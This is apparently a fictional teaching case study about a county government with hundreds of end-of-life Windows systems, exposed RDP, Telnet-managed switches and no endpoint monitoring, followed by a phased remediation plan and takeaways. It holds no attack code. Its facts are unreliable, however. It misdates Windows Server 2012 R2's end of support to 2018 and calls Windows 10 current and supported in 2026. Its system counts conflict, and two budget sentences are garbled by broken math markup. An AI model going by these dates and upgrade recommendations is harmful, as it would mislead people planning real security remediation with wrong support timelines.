Case: The County Government's 8-Year Technical Debt — 412 End-of-Life Systems

The Scenario

Smith County Government operates critical services for 287,000 residents across a network of approximately 800 computing systems: email infrastructure, document management platforms, permitting systems for building and business licenses, tax collection and payment processing, parks and recreation facility booking, voter registration, and human services case management. The IT department employs 18 people to operate and maintain this entire infrastructure. In February 2026, the County Board of Supervisors commissioned a vulnerability assessment as part of a compliance audit required for federal grant funding. The contracted security firm began scanning systems, reviewing configurations, and examining patch timelines.

The assessment’s findings, presented on March 1, 2026, were alarming:

End-of-Life Operating Systems: 412 of 800 systems (51.5%) were running Windows Server 2012 R2, which reached end-of-support on January 10, 2018—more than 5 years ago. An additional 150 systems (18.8%) were running Windows 7, unsupported since January 14, 2020. These ancient systems had not received a single security patch in over 5 years. Every publicly disclosed vulnerability that affected Windows Server 2012 R2 or Windows 7 was unpatched on County systems.

Plaintext Network Management: Telnet was enabled on 38 network switches (Cisco Catalyst, Juniper EX, HP ProCurve) for remote management. Telnet transmits credentials in plaintext over the network—an attacker on the local network or with access to upstream network traffic could capture switch administrator credentials and reconfigure network infrastructure. Telnet should have been completely disabled in favor of SSH (secure shell), which encrypts credentials and provides the same remote management capability.

Publicly-Exposed Remote Access: Three RDP (Remote Desktop Protocol) instances were exposed directly to the internet with public IP addresses. Port scans showed that these systems accepted RDP connections from any source. There was no multi-factor authentication protecting these endpoints, and during testing, the security firm found that one system accepted default credentials (Administrator / password), likely never changed from the initial system build.

Zero Endpoint Monitoring: The County had deployed traditional antivirus (Windows Defender on some systems, Symantec on others, nothing on legacy systems) but had no endpoint detection and response (edr-xdr) monitoring, no behavioral anomaly detection, and no ability to detect live attacks or lateral movement within the network.

Unmanaged Workstations: 340 workstations were running Windows 7 or older, unpatched, with no centralized patch management, no security baselines, and no verification that antivirus was even running. Workstation administrators would call the IT help desk when machines slowed down due to infections, and IT would reload Windows—sometimes from months-old disk images that didn’t include current patches.

Legacy Insecure Protocols: The assessment found FTP (insecure file transfer), unencrypted HTTP (not HTTPS) for internal web applications, and SNMP v1/v2 (plaintext credentials) on network devices. These protocols predated modern security standards and created additional attack surfaces.

The security assessment concluded: “Smith County has accumulated a significant backlog of vulnerabilities across operating systems, network devices, and applications. The vast majority of systems are running operating systems that no longer receive security patches from Microsoft. An attacker who exploits a known vulnerability in Windows Server 2012 R2 or Windows 7 would have access to 562 County systems (70% of the total infrastructure).”

The County Board held an emergency meeting on March 8, 2026. The IT Director, Robert Chen, explained the situation: “To remediate all vulnerabilities fully, we need to replace or upgrade 562 systems. At an average cost of $2,000persystem(hardware+software+deploymentlabor),w{e}^{\prime }relookingat$1.1M in capital spending, plus ongoing operational costs. Our annual IT budget is $180,000.” The board members exchanged looks of dismay. They had no idea the infrastructure was this fragile.

One board member asked: “How bad is it really? What’s the actual risk?” Robert replied: “Imagine a major vulnerability is published in Windows Server 2012 R2. We can’t patch it. An attacker exploits the vulnerability and gains remote access to one of our permitting systems. From there, they move laterally to the network and compromise the tax collection system. They steal taxpayer banking information, or they demand ransom. Our incident response capability is almost zero—we have no way to detect lateral movement happening.”

Another board member asked: “Can we do any quick wins with our $50,000 emergency budget?” Robert and the security assessment team designed a phased approach:

Phase 1—Immediate Containment ($15,000 / 2 weeks):

• Disable Telnet on all 38 switches; enable SSH instead with strong key-based authentication.
• Firewall block all inbound RDP from the internet; allow RDP only from a VPN gateway with multi-factor authentication.
• Deploy Windows 10 (current, supported OS) to 8 critical systems: permitting, tax collection, human services, and voter registration. This reduces the exposure of the highest-value targets.
• Implement EDR (endpoint detection and response) on those 8 critical systems to enable detection of lateral movement and live attacks.

Phase 2—Gradual Modernization ($20,000 / months 3-6):

• Migrate another 24 critical systems from Windows Server 2012 R2 to Windows Server 2019 (current supported version).
• Expand EDR to all critical systems (32 total).
• Implement centralized patch management and security baselines for all upgraded systems.

Phase 3—Long-Term Plan ($ongoing / 2-3 years):

• Develop a multi-year capital plan to upgrade remaining 538 legacy systems.
• Request federal grant funding to support the modernization (hospitals and healthcare systems often receive federal digital infrastructure grants).
• Retire systems that have no remaining business value rather than continuing to patch them.

The reality was grim: even with this aggressive phased plan, Smith County would not be fully remediated for 3–4 years. For that entire period, 530+ systems would remain unpatched, vulnerable to known exploits, and incapable of being defended with modern security controls.

What Went Right

• Vulnerability assessment identified the full scope of the problem: Rather than discovering vulnerabilities one at a time through breaches, the assessment provided a complete picture of exposure, enabling prioritized remediation.

• Phased approach prioritized critical systems: Rather than trying to remediate everything and failing, the team focused on the highest-value targets (tax collection, permitting, voter registration). This approach provided the best risk reduction with limited budget.

• Network segmentation was an interim defensive control: By implementing EDR on critical systems and firewalls to restrict lateral movement, the County could detect and contain breaches even if legacy systems were compromised.

• Transparent communication to leadership about constraints: IT leadership didn’t hide the problem or make excuses; they explained it clearly and provided data-driven prioritization.

What Could Go Wrong

• End-of-life systems with no patch path create permanent vulnerability: Windows Server 2012 R2 reached end-of-support in 2018. No patches exist for vulnerabilities discovered after that date. Organizations must either upgrade systems or accept unmitigated vulnerability; there is no middle ground.

• Plaintext network protocols enable lateral movement: Telnet enabled on switches means that an attacker who compromises a single workstation can capture switch credentials and reconfigure network infrastructure, disable logging, or create backdoors. SSH is mandatory for network device management.

• Publicly-exposed RDP without MFA is a critical vulnerability: RDP is a common attack vector. Exposed to the internet with weak or default credentials, it offers attackers trivial access to systems. RDP should never be exposed to the internet; it should be accessible only through a VPN gateway with multi-factor authentication.

• No endpoint detection means no visibility into active attacks: Traditional antivirus only detects known malware signatures. An attacker using unknown malware or leveraging legitimate tools (PowerShell, cmd.exe, wmic) can operate undetected on systems without EDR. No visibility = no incident response capability.

• Underfunded IT budgets compound over time into IT debt: The County’s $180KannualITbudgetisresponsiblefor800systems.Tha{t}^{\prime }s$225 per system per year for all operations, maintenance, and security. In such resource-constrained environments, new systems gradually age out of support without being replaced. This is a structural problem, not an individual failure.

Key Takeaways

• End-of-life systems are unpatched and indefensible: Systems past end-of-support receive no security patches. Every known vulnerability is exploitable. Organizations must replace or retire end-of-life systems; patching them is not an option.

• default-credentials must be changed immediately: Network switches, printers, cameras frequently ship with well-known default credentials. Change all default credentials during initial deployment. Automated inventory tools should flag any systems still using defaults.

• Plaintext protocols (Telnet, FTP, SNMP v1/v2) should be completely disabled: Replace Telnet with SSH, FTP with SFTP/SCP, SNMP v1/v2 with SNMPv3. These upgrades provide the same functionality with encryption and strong authentication.

• Remote access without VPN and MFA is a critical vulnerability: Exposing RDP, SSH, or other management protocols directly to the internet without multi-factor authentication is indefensible. Use a VPN gateway (with MFA) to gate all remote access.

• Vulnerability assessments reveal structural problems: When 51% of systems are running unsupported operating systems, the problem is not technical (we know how to fix it); it’s structural (we don’t have budget to fix it). Organizations must plan for and budget for regular system replacement, not wait for crisis to force upgrades.

Related Cases

• case-vulnerability-management — Managing large backlogs of vulnerabilities in heterogeneous environments; understanding risk-based-prioritization, remediation-vs-mitigation, and cve-common-vulnerabilities-and-exposures.

• case-hardening — Securing systems that can’t be immediately upgraded using security-baselines-and-hardening, compensating-controls, and network isolation.

• case-risk-management — Understanding supply chain risk, IT debt, and how to communicate technology risk to executive leadership in terms they understand (business impact).

• case-mitigation-techniques — When patching is impossible or delayed, implementing network-segmentation, least-privilege access controls, and monitoring to reduce exploitability.